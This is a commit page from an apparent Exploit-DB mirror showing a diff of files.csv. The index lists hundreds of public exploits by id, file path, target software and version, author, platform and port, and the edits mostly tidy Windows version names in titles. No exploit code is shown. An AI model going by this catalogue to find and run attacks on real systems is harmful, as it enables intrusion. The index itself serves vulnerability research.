bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-03-10

Browse source 
16 new exploits
This commit is contained in:
Offensive Security 2016-03-10 05:03:17 +00:00
parent a7c11413af
commit da08dab2c6
23 changed files with 6564 additions and 342 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

73
files.csv
View file

@ -150,7 +150,7 @@ id,file,description,date,author,platform,type,port
153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0
154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - _mremap()_ Local Proof-of-Concept (2)",2004-02-18,"Christophe Devine",linux,local,0
155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128
156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Win2k/XP)",2004-02-26,Rave,windows,remote,8080
156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Windows 2000/XP)",2004-02-26,Rave,windows,remote,8080
157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389
158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21
159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21
@ -256,7 +256,7 @@ id,file,description,date,author,platform,type,port
268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow Exploit (2)",2001-05-08,"dark spyrit",windows,remote,80
269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) - Remote Root Exploit (Linux x86)",2001-05-08,qitest1,linux,remote,21
270,platforms/irix/local/270.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/lib/print/netprint Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0
271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0
271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0
272,platforms/windows/local/272.c,"WinZIP MIME Parsing Overflow Proof of Concept Exploit",2004-04-15,snooq,windows,local,0
273,platforms/linux/local/273.c,"SquirrelMail chpasswd Buffer Overflow",2004-04-20,x314,linux,local,0
274,platforms/linux/dos/274.c,"Linux Kernel <= 2.6.3 - (setsockopt) Local Denial of Service Exploit",2004-04-21,"Julien Tinnes",linux,dos,0
@ -2744,7 +2744,7 @@ id,file,description,date,author,platform,type,port
3069,platforms/osx/dos/3069.pl,"VLC Media Player 0.8.6 (udp://) Format String Exploit PoC (ppc)",2007-01-02,MoAB,osx,dos,0
3070,platforms/osx/local/3070.pl,"VLC Media Player 0.8.6 (udp://) Format String Exploit (x86)",2007-01-02,MoAB,osx,local,0
3071,platforms/windows/local/3071.c,"Microsoft Vista - (NtRaiseHardError) Privilege Escalation Exploit",2007-01-03,erasmus,windows,local,0
3072,platforms/windows/remote/3072.py,"Apple Quicktime (rtsp URL Handler) Buffer Overflow Exploit (win2k)",2007-01-03,"Winny Thomas",windows,remote,0
3072,platforms/windows/remote/3072.py,"Apple Quicktime - (rtsp URL Handler) Buffer Overflow Exploit (Windows 2000)",2007-01-03,"Winny Thomas",windows,remote,0
3073,platforms/asp/webapps/3073.txt,"LocazoList <= 2.01a beta5 (subcatID) Remote SQL Injection Vulnerability",2007-01-03,ajann,asp,webapps,0
3074,platforms/asp/webapps/3074.txt,"E-SMARTCART 1.0 (product_id) Remote SQL Injection Vulnerability",2007-01-03,ajann,asp,webapps,0
3075,platforms/php/webapps/3075.pl,"VerliAdmin <= 0.3 (language.php) Local File Inclusion Exploit",2007-01-03,Kw3[R]Ln,php,webapps,0
@ -3137,7 +3137,7 @@ id,file,description,date,author,platform,type,port
3471,platforms/php/webapps/3471.txt,"Activist Mobilization Platform (AMP) 3.2 - Remote File Include Vuln",2007-03-13,the_day,php,webapps,0
3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 (root_path) Remote File Inclusion Vulnerability",2007-03-13,the_day,php,webapps,0
3473,platforms/php/webapps/3473.txt,"WebCreator <= 0.2.6-rc3 (moddir) Remote File Inclusion Vulnerability",2007-03-13,the_day,php,webapps,0
3474,platforms/windows/remote/3474.py,"WarFTP 1.65 (USER) Remote Buffer Overflow Exploit (win2k SP4)",2007-03-14,"Winny Thomas",windows,remote,21
3474,platforms/windows/remote/3474.py,"WarFTP 1.65 - (USER) Remote Buffer Overflow Exploit (Windows 2000 SP4)",2007-03-14,"Winny Thomas",windows,remote,21
3476,platforms/php/webapps/3476.pl,"Zomplog <= 3.7.6 - Local File Inclusion Vulnerabilty (Win32)",2007-03-14,Bl0od3r,php,webapps,0
3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 (comments.php id) Remote SQL Injection Exploit",2007-03-14,WiLdBoY,php,webapps,0
3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 (postpost.php) Remote Code Execution Vulnerability",2007-03-14,Dj7xpl,php,webapps,0
@ -3192,13 +3192,13 @@ id,file,description,date,author,platform,type,port
3528,platforms/php/webapps/3528.pl,"phpRaid < 3.0.7 (rss.php phpraid_dir) Remote File Inclusion Exploit",2007-03-20,"Cold Zero",php,webapps,0
3529,platforms/linux/local/3529.php,"PHP <= 5.2.1 hash_update_file() Freed Resource Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0
3530,platforms/php/webapps/3530.pl,"Monster Top List <= 1.4.2 (functions.php root_path) RFI Exploit",2007-03-20,fluffy_bunny,php,webapps,0
3531,platforms/windows/remote/3531.py,"Helix Server 11.0.1 - Remote Heap Overflow Exploit (win2k SP4)",2007-03-21,"Winny Thomas",windows,remote,554
3531,platforms/windows/remote/3531.py,"Helix Server 11.0.1 - Remote Heap Overflow Exploit (Windows 2000 SP4)",2007-03-21,"Winny Thomas",windows,remote,554
3532,platforms/php/webapps/3532.txt,"study planner (studiewijzer) <= 0.15 - Remote File Inclusion Vulnerability",2007-03-21,K-159,php,webapps,0
3533,platforms/php/webapps/3533.txt,"Digital Eye CMS 0.1.1b (module.php) Remote File Inclusion Vulnerability",2007-03-21,"Cold Zero",php,webapps,0
3534,platforms/asp/webapps/3534.txt,"Active Link Engine (default.asp catid) Remote SQL Injection Vulnerability",2007-03-21,CyberGhost,asp,webapps,0
3535,platforms/hardware/dos/3535.pl,"Grandstream Budge Tone-200 IP Phone (Digest domain) DoS Exploit",2007-03-21,MADYNES,hardware,dos,0
3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery (default.asp catid) SQL Injection Vulnerability",2007-03-21,CyberGhost,asp,webapps,0
3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4)",2007-03-21,"Winny Thomas",windows,remote,143
3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 - IMAP (SUBSCRIBE) Remote Exploit (Windows 2000 SP4)",2007-03-21,"Winny Thomas",windows,remote,143
3538,platforms/php/webapps/3538.txt,"php-revista <= 1.1.2 - Multiple Remote SQL Injection Vulnerabilities",2007-03-21,"Cold Zero",php,webapps,0
3539,platforms/php/webapps/3539.txt,"mambo component nfnaddressbook 0.4 - Remote File Inclusion Vulnerability",2007-03-21,"Cold Zero",php,webapps,0
3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 <= SP4 - IMAP Remote Exploit (egghunter mod)",2007-03-21,muts,windows,remote,143
@ -3238,7 +3238,7 @@ id,file,description,date,author,platform,type,port
3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC Local Buffer Overflow Exploit",2007-03-25,rgod,windows,local,0
3577,platforms/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double Free Memory Exploit (MS07-009)",2007-03-26,N/A,windows,remote,0
3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) - Local Root Buffer Overflow Exploit",2007-03-26,harry,bsd,local,0
3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (Win2K SP4)",2007-03-26,"Winny Thomas",windows,remote,21
3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 - (PASS) Remote Exploit (Windows 2000 SP4)",2007-03-26,"Winny Thomas",windows,remote,21
3580,platforms/php/webapps/3580.pl,"IceBB 1.0-rc5 - Remote Create Admin Exploit",2007-03-26,Hessam-x,php,webapps,0
3581,platforms/php/webapps/3581.pl,"IceBB 1.0-rc5 - Remote Code Execution Exploit",2007-03-26,Hessam-x,php,webapps,0
3582,platforms/php/webapps/3582.pl,"PHP-Nuke Module Addressbook 1.2 - Local File Inclusion Exploit",2007-03-26,bd0rk,php,webapps,0
@ -3343,7 +3343,7 @@ id,file,description,date,author,platform,type,port
3685,platforms/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software RFI Vulnerability",2007-04-08,the_Edit0r,php,webapps,0
3686,platforms/php/webapps/3686.txt,"WitShare 0.9 (index.php menu) Local File Inclusion Vulnerability",2007-04-08,the_Edit0r,php,webapps,0
3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit",2007-04-08,BeyazKurt,php,webapps,0
3688,platforms/windows/local/3688.c,"Microsoft Windows GDI - Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0
3688,platforms/windows/local/3688.c,"Microsoft Windows GDI - Local Privilege Escalation Exploit (MS07-017) (1)",2007-04-08,Ivanlef0u,windows,local,0
3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities",2007-04-08,Dj7xpl,php,webapps,0
3690,platforms/windows/dos/3690.txt,"Microsoft office word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0
3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - Remote SQL Injection Vulnerability",2007-04-09,"h a c k e r _ X",php,webapps,0
@ -3648,7 +3648,7 @@ id,file,description,date,author,platform,type,port
3993,platforms/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote BoF Exploit",2007-05-26,rgod,windows,remote,0
3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion Vulnerabilities",2007-05-26,"ThE TiGeR",php,webapps,0
3995,platforms/php/webapps/3995.txt,"TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability",2007-05-26,"Mehmet Ince",php,webapps,0
3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)",2007-05-26,fabio/b0x,windows,remote,80
3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite - Remote Overflow Exploit (Windows 2003)",2007-05-26,fabio/b0x,windows,remote,80
3997,platforms/php/webapps/3997.txt,"Frequency Clock 0.1b (securelib) Remote File Inclusion Vulnerabilities",2007-05-27,"ThE TiGeR",php,webapps,0
3998,platforms/php/webapps/3998.php,"Fundanemt <= 2.2.0 (spellcheck.php) Remote Code Execution Exploit",2007-05-27,Kacper,php,webapps,0
3999,platforms/php/webapps/3999.txt,"Vistered Little 1.6a (skin) Remote File Disclosure Vulnerability",2007-05-28,GoLd_M,php,webapps,0
@ -3715,7 +3715,7 @@ id,file,description,date,author,platform,type,port
4062,platforms/php/webapps/4062.pl,"Fuzzylime Forum 1.0 (low.php topic) Remote SQL Injection Exploit",2007-06-12,Silentz,php,webapps,0
4063,platforms/php/webapps/4063.txt,"xoops module tinycontent 1.5 - Remote File Inclusion Vulnerability",2007-06-12,Sp[L]o1T,php,webapps,0
4064,platforms/php/webapps/4064.txt,"xoops module horoscope <= 2.0 - Remote File Inclusion Vulnerability",2007-06-12,BeyazKurt,php,webapps,0
4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)",2007-06-13,rgod,windows,remote,0
4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX Control - Remote BoF Exploit (Windows 2000 SP4)",2007-06-13,rgod,windows,remote,0
4066,platforms/windows/remote/4066.html,"Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)",2007-06-13,rgod,windows,remote,0
4067,platforms/windows/dos/4067.html,"Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)",2007-06-13,"YAG KOHHA",windows,dos,0
4068,platforms/php/webapps/4068.txt,"XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability",2007-06-13,Sp[L]o1T,php,webapps,0
@ -5569,7 +5569,7 @@ id,file,description,date,author,platform,type,port
5948,platforms/php/webapps/5948.txt,"Jokes Complete Website 2.1.3 (jokeid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
5949,platforms/php/webapps/5949.txt,"Drinks Complete Website 2.1.0 (drinkid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
5950,platforms/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 (itemid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
5951,platforms/windows/local/5951.c,"XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit PoC",2008-06-26,Shinnok,windows,local,0
5951,platforms/windows/local/5951.c,"XnView 1.93.6 for Windows - '.taac' Local Buffer Overflow Exploit PoC",2008-06-26,Shinnok,windows,local,0
5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,CraCkEr,php,webapps,0
5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts Nms Insecure Cookie Handling Vulnerability",2008-06-26,"Virangar Security",php,webapps,0
5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 (params.php) Remote File Inclusion Vulnerability",2008-06-26,Ciph3r,php,webapps,0
@ -7607,7 +7607,7 @@ id,file,description,date,author,platform,type,port
8077,platforms/windows/dos/8077.html,"Microsoft Internet Explorer 7 - Memory Corruption PoC (MS09-002)",2009-02-18,N/A,windows,dos,0
8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (XP SP2)",2009-02-20,Abysssec,windows,remote,0
8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (py)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0
8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 - Memory Corruption PoC (MS09-002) (win2k3sp2)",2009-02-20,webDEViL,windows,remote,0
8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)",2009-02-20,webDEViL,windows,remote,0
8083,platforms/php/webapps/8083.txt,"phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0
8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - (t00t) Remote Denial of Service Exploit",2009-02-20,LiquidWorm,windows,dos,0
8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final - (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0
@ -9005,7 +9005,7 @@ id,file,description,date,author,platform,type,port
9538,platforms/php/webapps/9538.txt,"Silurus Classifieds System (category.php) SQL Injection Vulnerability",2009-08-28,Mr.SQL,php,webapps,0
9539,platforms/windows/dos/9539.py,"uTorrent <= 1.8.3 (Build 15772) Create New Torrent Buffer Overflow PoC",2009-08-28,Dr_IDE,windows,dos,0
9540,platforms/windows/local/9540.py,"HTML Creator & Sender <= 2.3 build 697 - Local BoF Exploit (SEH)",2009-08-28,Dr_IDE,windows,local,0
9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)",2009-08-31,kingcope,windows,remote,21
9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow Exploit (Windows 2000)",2009-08-31,kingcope,windows,remote,21
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 - (32-bit) ip_append_data() ring0 Root Exploit",2009-08-31,"INetCop Security",linux,local,0
9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit",2009-08-31,"Jon Oberheide",linux,local,0
9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 (index.php s) SQL Injection Vulnerability",2009-08-31,Red-D3v1L,php,webapps,0
@ -9021,7 +9021,7 @@ id,file,description,date,author,platform,type,port
9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x (MobileSafari) Crash & Reboot Exploit",2009-08-31,TheLeader,windows,dos,0
9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX (spnews.php) SQL Injection Vulnerability",2009-08-31,HxH,php,webapps,0
9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a Code Execution Exploit",2009-08-31,flyh4t,php,webapps,0
9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 - FTP Server Remote Stack Overflow Exploit (win2k sp4)",2009-09-01,muts,windows,remote,21
9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 - FTP Server Remote Stack Overflow Exploit (Windows 2000 SP4)",2009-09-01,muts,windows,remote,21
9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - (.m3u/UI.txt) Universal Local BoF Exploits",2009-09-01,hack4love,windows,local,0
9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter <= 2.53b330 - (.pls/.m3u) Unicode Crash PoC",2009-09-01,mr_me,windows,dos,0
9562,platforms/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure Vulnerabilities",2009-09-01,"SEC Consult",asp,webapps,0
@ -9807,7 +9807,7 @@ id,file,description,date,author,platform,type,port
10560,platforms/php/webapps/10560.txt,"Lizard Cart Multiple SQL Injection Exploit",2009-12-19,"cr4wl3r ",php,webapps,0
10561,platforms/php/webapps/10561.txt,"CFAGCMS SQL Injection Exploit",2009-12-19,"cr4wl3r ",php,webapps,0
10562,platforms/php/webapps/10562.txt,"Ptag <= 4.0.0 - Multiple RFI Exploit",2009-12-19,"cr4wl3r ",php,webapps,0
10563,platforms/windows/local/10563.py,"PlayMeNow Malformed M3U Playlist WinXP Universal BOF",2009-12-19,loneferret,windows,local,0
10563,platforms/windows/local/10563.py,"PlayMeNow - Malformed M3U Playlist BOF (Windows XP Universal)",2009-12-19,loneferret,windows,local,0
10564,platforms/php/webapps/10564.txt,"SaurusCMS <= 4.6.4 - Multiple RFI Exploit",2009-12-19,"cr4wl3r ",php,webapps,0
10566,platforms/php/webapps/10566.txt,"Explorer 7.20 - Cross-Site Scripting Vulnerability",2009-12-20,Metropolis,php,webapps,0
10567,platforms/php/webapps/10567.txt,"Advance Biz Limited <= 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-12-20,PaL-D3v1L,php,webapps,0
@ -9843,7 +9843,7 @@ id,file,description,date,author,platform,type,port
10599,platforms/php/webapps/10599.txt,"The Uploader 2.0 File Disclosure Vulnerability",2009-12-22,Stack,php,webapps,0
10600,platforms/php/webapps/10600.txt,"mypage 0.4 - Local File Inclusion Vulnerability",2009-12-22,BAYBORA,php,webapps,0
10601,platforms/php/webapps/10601.txt,"Mini File Host 1.5 - Remote File Upload Vulnerability",2009-12-22,MR.Z,php,webapps,0
10602,platforms/windows/local/10602.pl,"Easy RM to MP3 27.3.700 - WinXP SP3",2009-12-22,d3b4g,windows,local,0
10602,platforms/windows/local/10602.pl,"Easy RM to MP3 27.3.700 (Windows XP SP3)",2009-12-22,d3b4g,windows,local,0
10603,platforms/windows/dos/10603.c,"TFTP Daemon 1.9 - Denial of Service Exploit",2009-12-22,Socket_0x03,windows,dos,0
10604,platforms/php/webapps/10604.pl,"Simple PHP Blog 0.5.1 - Local File Inclusion Vulnerability",2009-12-22,jgaliana,php,webapps,0
10606,platforms/php/webapps/10606.txt,"weenCompany SQL Injection Vulnerability",2009-12-22,Gamoscu,php,webapps,0
@ -9862,7 +9862,7 @@ id,file,description,date,author,platform,type,port
10624,platforms/php/webapps/10624.txt,"Joomla Component com_carman Cross-Site Scripting Vulnerability",2009-12-24,FL0RiX,php,webapps,0
10625,platforms/php/webapps/10625.txt,"Joomla Component com_jeemaarticlecollection SQL injection",2009-12-24,FL0RiX,php,webapps,0
10626,platforms/php/webapps/10626.txt,"Jax Guestbook 3.50 Admin Login Exploit",2009-12-24,Sora,php,webapps,0
10628,platforms/windows/local/10628.pl,"CastRipper 2.50.70 - (.pls) Stack Buffer Overflow Exploit WinXP SP3",2009-12-24,d3b4g,windows,local,0
10628,platforms/windows/local/10628.pl,"CastRipper 2.50.70 - (.pls) Stack Buffer Overflow Exploit (Windows XP SP3)",2009-12-24,d3b4g,windows,local,0
10629,platforms/php/webapps/10629.txt,"Traidnt Gallery add Admin Exploit",2009-12-24,wlhaan-hacker,php,webapps,0
10630,platforms/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login Exploit",2009-12-24,Sora,multiple,webapps,0
10632,platforms/php/webapps/10632.pl,"Wbb3 - Blind SQL Injection Vulnerability",2009-12-24,molli,php,webapps,0
@ -9874,7 +9874,7 @@ id,file,description,date,author,platform,type,port
10640,platforms/php/webapps/10640.txt,"Joomla Component com_schools SQL injection",2009-12-24,Mr.tro0oqy,php,webapps,0
10642,platforms/windows/local/10642.rb,"Exploit Easy RM to MP3 2.7.3.700 - Ruby",2009-12-24,"John Babio",windows,local,0
10645,platforms/php/webapps/10645.txt,"PBX Phone System 2.x - Multiple Vulnerabilities",2009-12-24,Global-Evolution,php,webapps,0
10646,platforms/windows/local/10646.c,"CastRipper (.M3U) Stack BoF WinXP SP2",2009-12-24,bibi-info,windows,local,0
10646,platforms/windows/local/10646.c,"CastRipper - (.M3U) Stack BoF (Windows XP SP2)",2009-12-24,bibi-info,windows,local,0
10647,platforms/php/webapps/10647.txt,"VideoIsland Remote shell upload Vulnerability",2009-12-24,RENO,php,webapps,0
10648,platforms/php/webapps/10648.txt,"cms -db <= 0.7.13 - Multiple Vulnerabilities",2009-12-25,"cp77fk4r ",php,webapps,0
10649,platforms/windows/webapps/10649.html,"SoftCab Sound Converter ActiveX Insecure Method Exploit (sndConverter.ocx)",2009-12-25,"ThE g0bL!N",windows,webapps,0
@ -10093,7 +10093,7 @@ id,file,description,date,author,platform,type,port
10929,platforms/php/webapps/10929.txt,"Wordpress Events Plugin - SQL Injection Vulnerability",2010-01-02,Red-D3v1L,php,webapps,0
10930,platforms/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 - SQL Injection Vulnerability",2010-01-02,Sora,php,webapps,0
10931,platforms/php/webapps/10931.txt,"X7CHAT 1.3.6b - Add Admin Exploit",2010-01-02,d4rk-h4ck3r,php,webapps,0
10936,platforms/windows/local/10936.c,"PlayMeNow - Malformed M3U Playlist BoF WinXP SP2 Fr",2010-01-03,bibi-info,windows,local,0
10936,platforms/windows/local/10936.c,"PlayMeNow - Malformed M3U Playlist BoF (Windows XP SP2 French)",2010-01-03,bibi-info,windows,local,0
10938,platforms/php/webapps/10938.txt,"Service d'upload 1.0.0 - Shell Upload Vulnerability",2010-01-03,indoushka,php,webapps,0
10940,platforms/asp/webapps/10940.txt,"Football Pool 3.1 - Database Disclosure Vulnerability",2010-01-03,LionTurk,asp,webapps,0
10941,platforms/php/webapps/10941.php,"Joomla Component com_aprice Blind SQL Injection Exploit",2010-01-03,FL0RiX,php,webapps,0
@ -10279,7 +10279,7 @@ id,file,description,date,author,platform,type,port
11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0
11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - (.smi) Local Buffer Overflow PoC",2010-01-19,d3b4g,windows,dos,0
11198,platforms/php/webapps/11198.txt,"al3jeb script Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0
11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring Escalation Vulnerability (KiTrap0D)",2010-01-19,"Tavis Ormandy",windows,local,0
11199,platforms/windows/local/11199.txt,"Microsoft Windows NT/2000/XP/2003/Vista/2008/7 - User Mode to Ring Escalation Vulnerability (KiTrap0D)",2010-01-19,"Tavis Ormandy",windows,local,0
11202,platforms/windows/local/11202.pl,"RM Downloader .m3u BoF (SEH)",2010-01-19,jacky,windows,local,0
11203,platforms/multiple/remote/11203.py,"Pidgin MSN <= 2.6.4 File Download Vulnerability",2010-01-19,"Mathieu GASPARD",multiple,remote,0
11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray) (0day)",2010-01-20,Dz_attacker,windows,remote,0
@ -10322,7 +10322,7 @@ id,file,description,date,author,platform,type,port
11249,platforms/php/webapps/11249.txt,"boastMachine 3.1 - Remote File Upload Vulnerability",2010-01-24,alnjm33,php,webapps,0
11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service Exploit",2010-01-24,"Zer0 Thunder",windows,dos,0
11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow Exploit",2010-01-25,Dz_attacker,windows,local,0
11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow Exploit WinXP SP3 De",2010-01-25,NeoCortex,windows,local,0
11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow Exploit (Windows XP SP3 DE)",2010-01-25,NeoCortex,windows,local,0
11257,platforms/windows/remote/11257.rb,"AOL 9.5 Phobos.Playlist 'Import()' Buffer Overflow Exploit (Meta)",2010-01-25,Trancer,windows,remote,0
11258,platforms/php/webapps/11258.html,"Status2k Remote Add Admin Exploit",2010-01-25,alnjm33,php,webapps,0
11260,platforms/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 - Local Crash PoC",2010-01-26,b0telh0,windows,dos,0
@ -10434,7 +10434,7 @@ id,file,description,date,author,platform,type,port
11380,platforms/php/webapps/11380.txt,"osTicket 1.6 RC5 - Multiple Vulnerabilities",2010-02-09,"Nahuel Grisolia",php,webapps,0
11382,platforms/php/webapps/11382.txt,"eSmile Script (index.php) SQL Injection Vulnerability",2010-02-10,"AtT4CKxT3rR0r1ST ",php,webapps,0
11383,platforms/php/webapps/11383.txt,"HASHE! Solutions Multiple SQL Injection Vulnerabilities",2010-02-10,"AtT4CKxT3rR0r1ST ",php,webapps,0
11384,platforms/windows/local/11384.py,"WM Downloader 3.0.0.9 - PLS PLA Exploit (WinXP SP3)",2010-02-10,"Beenu Arora",windows,local,0
11384,platforms/windows/local/11384.py,"WM Downloader 3.0.0.9 - PLS PLA Exploit (Windows XP SP3)",2010-02-10,"Beenu Arora",windows,local,0
11385,platforms/php/webapps/11385.txt,"ULoki Community Forum 2.1 - (usercp.php) XSS Vulnerability",2010-02-10,"Sioma Labs",php,webapps,0
11391,platforms/windows/dos/11391.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Crash (PoC)",2010-02-10,loneferret,windows,dos,0
11392,platforms/windows/dos/11392.c,"Radasm 2.2.1.6 - (.rap) Local Buffer Overflow PoC",2010-02-11,"fl0 fl0w",windows,dos,0
@ -23062,7 +23062,7 @@ id,file,description,date,author,platform,type,port
25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 IP Parameter HTML Injection Vulnerability",2005-06-27,Megabyte,php,webapps,0
25910,platforms/asp/webapps/25910.txt,"Community Server Forums 'SearchResults.aspx' Cross-Site Scripting Vulnerability",2005-06-28,abducter_minds@yahoo.com,asp,webapps,0
25911,platforms/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service Vulnerability",2005-06-28,fRoGGz,windows,dos,0
25912,platforms/windows/local/25912.c,"Windows NT/2K/XP/2K3/Vista/2K8/7/8 - EPATHOBJ Local Ring Exploit",2013-06-03,"Tavis Ormandy",windows,local,0
25912,platforms/windows/local/25912.c,"Microsoft Windows NT/2000/XP/2003/Vista/2008/7/8 - Local Ring Exploit (EPATHOBJ)",2013-06-03,"Tavis Ormandy",windows,local,0
25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 Error.ASP Cross-Site Scripting Vulnerability",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0
25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0
25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0
@ -29665,7 +29665,7 @@ id,file,description,date,author,platform,type,port
32888,platforms/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 SQL Injection and Cross-Site Scripting Vulnerabilities",2009-04-02,"Patrick Webster",asp,webapps,0
32889,platforms/php/webapps/32889.txt,"4CMS SQL Injection and Local File Include Vulnerabilities",2009-04-02,k1ll3r_null,php,webapps,0
